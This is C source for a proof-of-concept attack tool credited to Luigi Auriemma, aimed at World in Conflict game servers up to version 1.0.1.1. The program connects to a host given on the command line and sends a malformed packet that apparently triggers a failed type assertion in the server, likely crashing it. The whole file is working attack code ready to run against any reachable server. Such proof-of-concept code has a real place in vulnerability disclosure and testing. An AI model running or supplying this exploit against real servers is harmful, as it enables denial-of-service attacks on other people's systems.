/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        48000
#define BUFFSZ      1364

#define DL          0x444c
#define UC          0x5543  // unsigned char
#define US          0x5553  // unsigned short
#define UI          0x5549  // unsigned int



int wic_send(int sd, u8 *data, int len);
int putcc(u8 *data, int chr, int len);
int putxx(u8 *data, u32 num, int bits);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    struct  linger  ling = {1,1};
    int     sd;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    fputs("\n"
        "World in Conflict <= 1.0.1.1 wrong type assert "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));

    p = buff;
    p += putxx(p, DL,   16);
    p += putxx(p, 317,  16);                                // out of order delimiter
    p += putxx(p, US,   16);    p += putxx(p, 35,   16);    // build number
    p += putxx(p, US,   16);    p += putxx(p, 126,  16);    // protocol version
    p += putxx(p, US,   16);    p += putxx(p, 6,    16);    // minor version
    p += putxx(p, 16,   16);    p += putcc(p, '\0', 16*2);  // utf16 password (set empty here)

    p += putxx(p, 0xA552, 16);  // failed assert

    // player join:
    // p += putxx(p, UC,   16);    p += putxx(p, 1,    8);     // slots 1 - 8
    // p += putxx(p, UI,   16);    p += putxx(p, 0,    32);
    // p += putxx(p, UI,   16);    p += putxx(p, 0,    32);
    // p += putxx(p, UI,   16);    p += putxx(p, 0,    32);
    // p += putxx(p, UI,   16);    p += putxx(p, 0,    32);
    // p += putxx(p, UC,   16);    p += putxx(p, 0,    8);
    // p += putxx(p, 25,   16);    p += putcc(p, 'a',  25*2);  // utf16 username
    // p += putxx(p, UI,   16);    p += putxx(p, 0,    32);
    wic_send(sd, buff, p - buff);

    close(sd);
    printf("- you must check the server manually to know if it's vulnerable or not\n");
    return(0);
}



int wic_send(int sd, u8 *data, int len) {
    u16     xlen;
    u8      tmp[2];

    xlen = len;
    xlen |= 0x4000; // out of order
    //xlen |= 0x8000; // zlib compression
    putxx(tmp, xlen, 16);
    if(send(sd, tmp, 2, 0) != 2) return(-1);
    if(len) {
        if(send(sd, data, len, 0) != len) return(-1);
    }
    return(0);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3));
    }
    return(bytes);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


